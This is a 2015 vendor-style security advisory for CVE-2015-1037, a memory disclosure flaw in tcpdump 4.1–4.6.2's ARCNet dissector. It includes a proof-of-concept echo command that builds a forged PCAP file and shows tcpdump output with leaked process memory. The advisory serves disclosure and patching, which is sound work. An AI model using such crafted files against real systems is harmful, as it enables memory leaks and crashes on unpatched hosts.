Sense of Security – Security Advisory – SOS-15-001
| Release Date. | 21-Jan-2015 |
| Last Update. | – |
| Vendor Notification Date. | 05-Jan-2015 |
| Product. | tcpdump |
| Platform. | Windows / *nix / Mac OSX |
| Affected versions. | 4.1 – 4.6.2 |
| Severity Rating. | Medium |
| Impact. | Memory disclosure |
| Attack Vector. | Local |
| Solution Status. | Vendor Update |
| CVE reference. | CVE-2015-1037 |
Details.
tcpdump is a common command line packet analyser. It allows the user to display TCP/IP and other packets being transmitted or received over a network to which the computer is attached. When dissecting an ARCNet packet type, tcpdump uses the length announced in the PCAP in the ARCNet header to read and display the packet content mapped in memory, by calling the function hex_and_ascii_print_with_offset(). If the captured length is less than the length announced in the packet (which can be forged), the call to arcnet_if_print() function will dump memory content, eventually causing tcpdump to generate a segmentation fault crash if the pointer reaches an invalid address.
Proof of Concept.
The following lines will generate a Proof-of-Concept PCAP file, called ‘dump.pcap’. By replaying this PCAP file, tcpdump will dump 0x1000 bytes of the process memory.
$ echo ‘\xd4\xc3\xb2\xa1\x02\[email protected]\x00\x00\x16\x00\xed\x00\x00\x00\x00 \x00\x00\x00\x81\x00\x00\x00\xce`\xb3T\xff\x00\x00\x00\x10\x00\x00\x00
\x08\x10\x00\x00\x00\x00\x00\x00\xd5\x00\x00\x00AAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA’ > dump.pcap
$ tcpdump –version
tcpdump version 4.6.2
libpcap version 1.6.2
OpenSSL 1.0.1j 15 Oct 2014
$ tcpdump -r dump.pcap
reading from file dump.pcap, link-type ARCNET_LINUX (Linux ARCNET)
17:18:53.000255 [|ARP]
0x0000: 4141 4141 4141 4141 ffff ffff ffff ffff AAAAAAAA……..
0x0010: 0000 0000 0000 0000 20b1 9d01 0000 0000 …………….
[snip]0x0c80: 4100 0000 0000 0000 2f6c 6962 2f78 3836 A……./lib/x86
0x0c90: 5f36 342d 6c69 6e75 782d 676e 7500 6c69 _64-linux-gnu.li
0x0ca0: 626e 7373 5f66 696c 6573 2e73 6f2e 3200 bnss_files.so.2.
0x0cb0: 2e73 6f2e 3200 0000 4000 0000 0000 0000 .so.2…@…….
0x0cc0: 3100 0000 0000 0000 b0bd 9d01 0000 0000 1……………
[snip]Solution.
Update to tcpdump version 4.6.3.
Discovered by.
Christophe Alladoum from Sense of Security Labs.